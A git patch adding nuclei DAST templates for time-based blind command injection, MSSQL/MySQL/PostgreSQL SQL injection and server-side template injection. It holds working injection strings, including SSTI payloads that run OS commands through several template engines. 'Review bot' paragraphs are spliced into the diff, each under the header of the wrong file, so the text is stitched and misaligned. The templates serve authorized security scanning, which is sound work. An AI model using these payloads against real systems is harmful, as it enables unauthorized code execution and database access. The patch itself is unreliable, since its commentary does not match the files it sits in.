From 6093d8508a061adc33241d20e2aa99f339cbf391 Mon Sep 17 00:00:00 2001
From: Ice3man
Date: Wed, 20 Nov 2024 20:31:14 +0530
Subject: [PATCH] feat: added blind time based fuzzing templates using analyzer

---
 .../cmdi/cmdi-time-based-blind.yaml | 60 +++++++++++++++++++
 .../sqli/mssql-time-based-sqli.yaml | 49 +++++++++++++++
 .../sqli/mysql-time-based-sqli.yaml | 56 +++++++++++++++++
 .../sqli/postgres-time-based-sqli.yaml | 52 ++++++++++++++++
 .../vulnerabilities/ssti/ssti-time-based.yaml | 46 ++++++++++++++
 5 files changed, 263 insertions(+)
 create mode 100644 dast/vulnerabilities/cmdi/cmdi-time-based-blind.yaml
 create mode 100644 dast/vulnerabilities/sqli/mssql-time-based-sqli.yaml
 create mode 100644 dast/vulnerabilities/sqli/mysql-time-based-sqli.yaml
 create mode 100644 dast/vulnerabilities/sqli/postgres-time-based-sqli.yaml
 create mode 100644 dast/vulnerabilities/ssti/ssti-time-based.yaml

diff --git a/dast/vulnerabilities/cmdi/cmdi-time-based-blind.yaml b/dast/vulnerabilities/cmdi/cmdi-time-based-blind.yaml
new file mode 100644
index 00000000000..de4aedc9d90
--- /dev/null
+++ b/dast/vulnerabilities/cmdi/cmdi-time-based-blind.yaml
@@ -0,0 +1,60 @@
+id: command-injection-blind-time-based
+
+info:
+ name: Command Injection - Blind Time based
+ author: pdteam
+ severity: critical
+ reference:
+ - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/CommandInjectionScanRule.java
+
+http:
+ - payloads:
+ injections:
+ low:
+ - "&sleep [SLEEPTIME]&"
+ - ";sleep [SLEEPTIME];"
+ - "&timeout /T [SLEEPTIME]"
+ - "$(sleep [SLEEPTIME])"
+ - "`sleep [SLEEPTIME]`"
+ medium:
+ - "|timeout /T [SLEEPTIME]"
+ - ";start-sleep -s [SLEEPTIME]"
+ - "\"&sleep [SLEEPTIME]&\""
+ - "\";sleep [SLEEPTIME];\""
+ - "\"&timeout /T [SLEEPTIME]&\""
+ - "\";start-sleep -s [SLEEPTIME]"
+ - "'&sleep [SLEEPTIME]&'"
+ - "';sleep [SLEEPTIME];'"
+ high:
+ - "'&timeout /T [SLEEPTIME]&'"
+ - "'|timeout /T [SLEEPTIME]"
+ - "';start-sleep -s [SLEEPTIME]"
+ - "\nsleep [SLEEPTIME]\n"
+ - "`sleep [SLEEPTIME]`"
+ - "||sleep [SLEEPTIME]"
+ - "&&sleep [SLEEPTIME]"
+ - "\"|timeout /T [SLEEPTIME]"
+ - "|sleep [SLEEPTIME]#"
+ - "run timeout /T [SLEEPTIME]"
+ - ";start-sleep -s [SLEEPTIME] #"
+ - "&[SLEEPTIME]&"
+ - ";[SLEEPTIME];"
+
+ attack: pitchfork
+ analyzer:
+ name: time_delay
+
+ fuzzing:
+ - part: request
+ type: postfix
+ mode: single
+ fuzz:
+ - "{{injections}}"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: analyzer
+ words:
+ - "true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/sqli/mssql-time-based-sqli.yaml b/dast/vulnerabilities/sqli/mssql-time-based-sqli.yaml
new file mode 100644
index 00000000000..5462d9de832
--- /dev/null
+++ b/dast/vulnerabilities/sqli/mssql-time-based-sqli.yaml
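Review bot: The last two `high` payloads, `&[SLEEPTIME]&` and `;[SLEEPTIME];`, contain no delay command at all, so they cannot produce the latency the `time_delay` analyzer measures and only add two requests per fuzzed parameter; unless they are meant for an injection point that already sits after a sleep-like command, drop them, and drop the backtick `sleep` payload that is listed in both `low` and `high`. Because a hit here is decided purely by the analyzer's timing model, a comment next to `severity: critical` such as `# timing-based: a match is statistical, confirm manually before reporting` would help triage of false positives on slow targets. `matchers-condition: and` is redundant with a single matcher, in this file and in its four siblings. The Windows `timeout /T` variants are taken from ZAP, but `timeout` aborts immediately when stdin is not interactive, so those payloads are presumably best-effort — worth a comment so nobody relies on them.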
@@ -0,0 +1,49 @@
+id: mssql-blind-time-based-sqli
+
+info:
+ name: MSSQL SQLi - Blind Time based
+ author: pdteam
+ severity: critical
+ reference:
+ - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionMsSqlScanRule.java
+
+http:
+ - payloads:
+ injections:
+ low:
+ - " WAITFOR DELAY '0:0:[SLEEPTIME]' --"
+ - "' WAITFOR DELAY '0:0:[SLEEPTIME]' --"
+ - "\" WAITFOR DELAY '0:0:[SLEEPTIME]' --"
+ medium:
+ - ") WAITFOR DELAY '0:0:[SLEEPTIME]' --"
+ - ") ' WAITFOR DELAY '0:0:[SLEEPTIME]' --"
+ - ") \" WAITFOR DELAY '0:0:[SLEEPTIME]' --"
+ - ")) WAITFOR DELAY '0:0:[SLEEPTIME]' --"
+ - ")) ' WAITFOR DELAY '0:0:[SLEEPTIME]' --"
+ - ")) \" WAITFOR DELAY '0:0:[SLEEPTIME]' --"
+ high:
+ - ") WAITFOR DELAY '0:0:[SLEEPTIME]' ("
+ - ") ' WAITFOR DELAY '0:0:[SLEEPTIME]' ("
+ - ") \" WAITFOR DELAY '0:0:[SLEEPTIME]' ("
+ - ")) WAITFOR DELAY '0:0:[SLEEPTIME]' (("
+ - ")) ' WAITFOR DELAY '0:0:[SLEEPTIME]' (("
+ - ")) \" WAITFOR DELAY '0:0:[SLEEPTIME]' (("
+
+ attack: pitchfork
+ analyzer:
+ name: time_delay
+
+ fuzzing:
+ - part: request
+ type: postfix
+ mode: single
+ fuzz:
+ - "{{injections}}"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: analyzer
+ words:
+ - "true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/sqli/mysql-time-based-sqli.yaml b/dast/vulnerabilities/sqli/mysql-time-based-sqli.yaml
new file mode 100644
index 00000000000..5f79874e677
--- /dev/null
+++ b/dast/vulnerabilities/sqli/mysql-time-based-sqli.yaml
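Review bot: `WAITFOR DELAY '0:0:[SLEEPTIME]'` hard-codes the seconds field of an hh:mm:ss literal, so every payload silently turns into a syntax error if whatever the analyzer substitutes for `[SLEEPTIME]` is 60 or more, yet the template pins nothing under `analyzer:` and relies on defaults that are not visible here. If the `time_delay` analyzer accepts parameters, pin the sleep duration explicitly; either way add `# [SLEEPTIME] must stay below 60: WAITFOR DELAY takes hh:mm:ss` above `low:`. The MySQL sibling carries a `# payloads taken from zap` provenance comment while this file only has the reference URL; keep that consistent across the set.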
@@ -0,0 +1,56 @@
+id: mysql-blind-time-based-sqli
+
+info:
+ name: MySQL SQLi - Blind Time based
+ author: pdteam
+ severity: critical
+ reference:
+ - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionMySqlScanRule.java
+
+http:
+ # payloads taken from zap
+ - payloads:
+ injections:
+ low:
+ - " / sleep([SLEEPTIME]) "
+ - "' / sleep([SLEEPTIME]) / '"
+ - "\" / sleep([SLEEPTIME]) / \""
+ - " and 0 in (select sleep([SLEEPTIME]) ) -- "
+ - "' and 0 in (select sleep([SLEEPTIME]) ) -- "
+ - "\" and 0 in (select sleep([SLEEPTIME]) ) -- "
+ medium:
+ - " where 0 in (select sleep([SLEEPTIME]) ) -- "
+ - "' where 0 in (select sleep([SLEEPTIME]) ) -- "
+ - "\" where 0 in (select sleep([SLEEPTIME]) ) -- "
+ - " or 0 in (select sleep([SLEEPTIME]) ) -- "
+ - "' or 0 in (select sleep([SLEEPTIME]) ) -- "
+ - "\" or 0 in (select sleep([SLEEPTIME]) ) -- "
+ - " where 0 in (select sleep([SLEEPTIME]) ) "
+ - "' where 0 in (select sleep([SLEEPTIME]) ) and ''='"
+ high:
+ - "\" where 0 in (select sleep([SLEEPTIME]) ) and \"\"=\""
+ - " and 0 in (select sleep([SLEEPTIME]) ) "
+ - "' and 0 in (select sleep([SLEEPTIME]) ) and ''='"
+ - "\" and 0 in (select sleep([SLEEPTIME]) ) and \"\"=\""
+ - " or 0 in (select sleep([SLEEPTIME]) ) "
+ - "' or 0 in (select sleep([SLEEPTIME]) ) and ''='"
+ - "\" or 0 in (select sleep([SLEEPTIME]) ) and \"\"=\""
+
+ attack: pitchfork
+ analyzer:
+ name: time_delay
+
+ fuzzing:
+ - part: request
+ type: postfix
+ mode: single
+ fuzz:
+ - "{{injections}}"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: analyzer
+ words:
+ - "true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/sqli/postgres-time-based-sqli.yaml b/dast/vulnerabilities/sqli/postgres-time-based-sqli.yaml
new file mode 100644
index 00000000000..6e06e997b50
--- /dev/null
+++ b/dast/vulnerabilities/sqli/postgres-time-based-sqli.yaml
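Review bot: `sleep()` is non-deterministic in MySQL, so in the `and`/`or`/`where 0 in (select sleep([SLEEPTIME]))` forms the server may evaluate it once per candidate row rather than once per statement; against a multi-row table the delay multiplies, the request is more likely to hit the HTTP client timeout than to show the proportional delay the `time_delay` analyzer looks for, and the scan effectively ties up the target's database. Document this above `low:` with `# sleep() can run per row on large tables: keep SLEEPTIME small and expect timeouts` and keep the analyzer's sleep duration low. The payloads correctly end in `-- ` with the trailing space MySQL requires for a line comment; a comment saying `# trailing space after -- is required by MySQL` would stop someone trimming it later. Placing `# payloads taken from zap` between `http:` and `- payloads:` works but reads oddly; the other four templates put nothing there, so either move it into `info` or add the same line to the siblings.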
@@ -0,0 +1,52 @@
+id: postgres-sqli-time-based
+
+info:
+ name: PostgreSQL Time based SQL Injection
+ author: pdteam
+ severity: critical
+ reference:
+ - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionPostgreScanRule.java
+
+
+http:
+ - payloads:
+ injections:
+ low:
+ - "case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end"
+ - "case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end --"
+ - "' case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end --"
+ - "\" case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end --"
+ medium:
+ - " / case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end "
+ - "' / case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end / '"
+ - "\" / case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end / \""
+ - " where 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --"
+ - "' where 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --"
+ - "\" where 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --"
+ high:
+ - " and 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --"
+ - "' and 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --"
+ - "\" and 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --"
+ - " or 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --"
+ - "' or 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --"
+ - "\" or 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --"
+
+ attack: pitchfork
+
+ analyzer:
+ name: time_delay
+
+ fuzzing:
+ - part: request
+ type: postfix
+ mode: single
+ fuzz:
+ - "{{injections}}"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: analyzer
+ words:
+ - "true"
diff --git a/dast/vulnerabilities/ssti/ssti-time-based.yaml b/dast/vulnerabilities/ssti/ssti-time-based.yaml
new file mode 100644
index 00000000000..a4173c4844d
--- /dev/null
+++ b/dast/vulnerabilities/ssti/ssti-time-based.yaml
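Review bot: The first two `low` payloads begin with `case when ...` and no leading separator, while every other payload in the file starts with a space, a quote or `/`; under `type: postfix` they are glued onto the existing parameter value (`42case when ...`), which yields at best a parse error rather than an injection. In ZAP these forms replace the value outright, so either prefix them with a space like the others or move them to a replace-style fuzz entry, and note the choice with `# bare case-when forms only make sense when replacing the whole value`. This file also differs cosmetically from its four siblings: an extra blank line before `http:` and before `analyzer:`, and a trailing newline where the others have none; harmless, but worth aligning since the templates are clearly meant as a set.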
@@ -0,0 +1,46 @@
+id: ssti-blind-time-based
+
+info:
+ name: Server Side Template Injection - Blind Time based
+ author: pdteam
+ severity: critical
+ reference:
+ - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SstiBlindScanRule.java
+
+http:
+ - payloads:
+ injections:
+ low:
+ - "<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"sleep [SLEEPTIME]\") }" # javaFreemarker
+ - "#set($engine=\"\")\n#set($proc=$engine.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"sleep [SLEEPTIME]\"))\n#set($null=$proc.waitFor())\n${null}" # javaVelocity
+ - "{{= global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString() }}" # Javascript dot
+ - "<%= global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString()%>" # Javascript EJS
+ - "#{global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString()}" # Javascript jade
+ - "{{range.constructor(\"return eval(\\\"global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString()\\\")\")()}}" # Javascript Nunjucks
+ - "{system(\"sleep [SLEEPTIME]\")}" # PHP smarty
+ - "{{\"\".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get(\"__builtins__\").get(\"__import__\")(\"subprocess\").check_output(\"sleep [SLEEPTIME]\")}}" # python3 jinja2
+ - "${__import__(\"subprocess\").check_output(\"sleep [SLEEPTIME]\", shell=True)}" # python Mako
+ - "{{__import__(\"subprocess\").check_output(\"sleep [SLEEPTIME]\", shell=True)}}" # Python
+ - "<%=%x(sleep [SLEEPTIME])%>" # Ruby ERB
+ - "#{%x(sleep [SLEEPTIME])}" # Ruby Slims
+ - "{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('sleep [SLEEPTIME]')}}"
+
+ skip-variables-check: true
+ attack: pitchfork
+ analyzer:
+ name: time_delay
+
+ fuzzing:
+ - part: request
+ type: postfix
+ mode: single
+ fuzz:
+ - "{{injections}}"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: analyzer
+ words:
+ - "true"
\ No newline at end of file
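Review bot: The `# python3 jinja2` payload calls `check_output("sleep [SLEEPTIME]")` without `shell=True`, so Python looks for an executable literally named `sleep N`, raises, and never sleeps; the Mako and plain-Python payloads two lines below pass `shell=True` and this one should match them. The same payload hard-codes `__subclasses__()[157]`, an index that depends on the interpreter's loaded class list and will point at a different class on most targets, so a version-independent route such as `{{cycler.__init__.__globals__.os.popen('sleep [SLEEPTIME]').read()}}` is more reliable. `skip-variables-check: true` covers nuclei's unresolved-variable check, but it is worth confirming that nuclei does not try to evaluate the `{{ ... }}` inside the substituted payload text before it is sent. The last payload is the only one without an engine comment; add `# PHP Twig` for consistency with the rest of the list.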